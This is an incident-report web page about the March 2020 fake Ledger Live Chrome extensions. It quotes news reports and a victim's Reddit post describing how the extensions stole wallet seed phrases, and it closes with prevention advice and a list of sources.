$2 500 000 USD

MARCH 2020

GLOBAL

LEDGER

DESCRIPTION OF EVENTS

"Based in France, Ledger is the largest cryptocurrency hardware wallet company." "Ledger is a hardware cryptocurrency wallet that is used to store, manage, and sell cryptocurrency. The funds held in these wallets are secured using a 24-word recovery phrase and an optional secret passphrase that only the owner knows."

 

"Ledger offers two products, the Nano S and Nano X, that can store the digital keys used to secure crypto wallets. The devices can be used with a variety of cryptocurrencies, are compatible with numerous apps, and are supposed to offer a safe way to manage crypto without compromising too much on convenience. Ledger says on its website that it has sold 1.5 million products to customers in 165 countries to date."

 

"Online scammers have been targeting other popular crypto companies to impersonate their apps on Google and steal money from users." "The extensions he discovered impersonated well-known crypto firms such as Ledger, KeepKey, MetaMask and Jaxx. Their purpose is to trick users into giving away the credentials needed to access their wallets." "In early March, leading cryptocurrency hardware-wallet producer Ledger warned its users about the phishing extensions on the store."

 

"Ledger’s Twitter account warned users of fraudulent Chrome Extensions on March 5." "[A]ccording to Denley, the extension is also heavily advertised via Google ads for the keywords "Ledger Live," the Ledger service it's trying to impersonate."

 

"Leannekera said that sick, and in the isolation of quarantine, she made the decision to consolidate her Cryptocurrencies into Bitcoin as “money is tight,” and she believed that the consolidation would “recoup around 20%” of her and her husband’s losses."

 

"I’m self isolated as I am one of the many victims of Covid-19. I’m confined to a room in our house while my husband who is a key worker, continues to leave for work each day during the UK’s first lockdown. He’s an absolute hero, but I desperately wish our circumstances where different. I desperately wish I could just hug him."

 

"I have little but a laptop to keep me sane during the day at the minute, so I am frequenting Reddit often and keeping an eye on the crypto markets. Due to the situation right now money is tight, however I had worked out that by consolidating a few of our other crypto I would be able to recoup around 20% of our losses to help."

 

"A fake Chrome extension has been found, asking to enter your 24 word recover phrase."

 

“I recalled the Ledger having a Chrome extension and this is when the scam starts,” she wrote.

 

"The scam was particularly malicious because of steps that hackers may have taken to make it appear to be legitimate: “the only ledger extension on the Chrome store is one by the name of ‘Ledger Wallet’ or ‘Ledger Live,’” she wrote."

 

“It claims to be from Ledger.com ® or Ledger Official ® and for all intents and purposes looks legitimate. It even had over 70 positive 4-5 star reviews, ranging from ‘Its a little difficult to operate’ to ‘once I understood what to do it was easy.’”

 

"However, the extension then prompted her to enter her wallets’ proprietary seed phrase, which allowed the hackers to take ownership of its private keys and send the XRP to their own wallet."

 

“The entire process took less than 8 minutes,” she said.

 

"In [a] post, which was made on March 28, Reddit user ‘Leannekera,’ who also claims to be infected with the coronavirus, wrote that she felt “so embarrassed” after she “watched our xrp transfer from our account to an account that is currently holding over $2.5 million in xrp.”"

 

"“This is clearly a large operation,” she wrote."

 

"Fake “Ledger Live” chrome extensions are used to collect user backup passphrases. They are advertised in Google searches and use Google Docs for collecting data. Accounts are being emptied and we have seen more than 200K XRP being stolen the past month alone."

 

"Since Ledger hardware wallets are used to manage more than 20 types of cryptocurrency accounts, a hacker who manages to steal a Ledger seed phrase could gain access to large amounts of cryptocurrency."

 

"A fraudulent cryptocurrency wallet masquerading as legitimate Google Chrome extensions may be responsible for a scam operation that may have claimed as much as $2.5 million in XRP, according to a report from a Reddit user who claims to have lost roughly $2,500 in XRP to the scam extension over the weekend."

 

"I have since reset the ledger, filed a report with Ripple, the FBI and my local Fraud Police. My husband has been ridiculously understanding. He says its just money and right now our focus should be on getting better / staying safe. I feel devastated."

 

"While the exact Chrome Extension she allegedly used is no longer online, Leannekera said that she had “seen it re-uploaded this morning” at the time of the post. Both of the links that she supplied to the alleged scam wallets were dead ends, seeming to indicate that they had been removed from the Chrome Web Store."

 

"However, searching the web store revealed that there is a Ledger Wallet extension still live on the platform, and there are a number of reviews that say that it is a scam."

A number of malicious Google Chrome extensions were created in March 2020, which claim to be official Ledger Live wallets. The extension is also set up on Google to show up as an advertisement in the search results. During the supposed wallet setup process, users are requested to enter their seed phrase, which is sent to the attacker via a Google Form. The seed phrases can be used by the attacker to empty victim wallets and take their funds. There is a report of at least $2.5m worth of XRP being taken, while the amount of any other funds is less certain.

HOW COULD THIS HAVE BEEN PREVENTED?

Always check and visit the official website of a service. The majority of funds should be stored offline and not on a live wallet application. When setting up a new wallet or upgrading wallet software, never enter your pass phrase or send any funds without first transferring a smaller amount.

 

Check Our Framework For Safe Secure Exchange Platforms

@Cointelegraph Twitter (Feb 25)
Trezor crypto wallet warns users of doppelgänger scam app on Google Play (Feb 25)
22 More Crypto-Stealing Google Chrome Extensions Discovered (Mar 2)
More crypto-stealing Chrome extensions swatted by Google – Naked Security (Mar 2)
@danfinlay Twitter (Mar 2)
Fake Ledger Chrome Extension Crypto Scam May Have Stolen Up to $2.5M | Finance Magnates (Mar 7)
@Ledger_Support Twitter (Mar 7)
@xrpforensics Twitter (Mar 7)
Reddit - Dive into anything (Mar 7)
Fake Ledger Chrome Extensions Continue to Steal Crypto From Victims (Mar 7)
Fraudulent Ledger Chrome Scam May Have Stolen up to $2.5 Million in Crypto | Cryptoglobe (Mar 7)
Fake Ledger Chrome extension continues to steal millions of XRP from crypto users - TokenPost (Mar 7)
Reddit - Dive into anything (Mar 7)
Malicious Chrome extension caught stealing Ledger wallet recovery seeds | ZDNet (Mar 7)
@sniko_ Twitter (Mar 7)
Nasty Ledger wallet scams. And how to avoid them. - Who Took My Crypto (Mar 20)
Ledger Wallet Warns of Fake Google Chrome Extension Stealing Crypto (Jul 2)
Metamask got hacked - Moralis Academy Forum (Aug 22)
Discovering Fake Browser Extensions That Target Users Of Ledger Trezor Mew Metamask And More (Aug 22)
Fake Chrome extension steals crypto from users, warns Ledger Wallet | Invezz (Aug 22)
The Dangers Of Malicious Browser Extensions (Aug 22)
My money from my ethereum account were stolen after I acceded the account via MEW CX extension. - Google Chrome Community (Aug 22)
Downloaded new KeepKep Client, my funds were stolen 10 Minutes Later... Who do I vengefully hunt down?! : keepkey (Aug 22)

Sources And Further Reading

 For questions or enquiries, email info@quadrigainitiative.com.

Get Social

  • email
  • reddit
  • telegram
  • Twitter

© 2021 Quadriga Initiative. Your use of this site/service accepts the Terms of Use and Privacy Policy. This site is not associated with Ernst & Young, Miller Thompson, or the Official Committee of Affected Users. Hosted in Canada by HosterBox.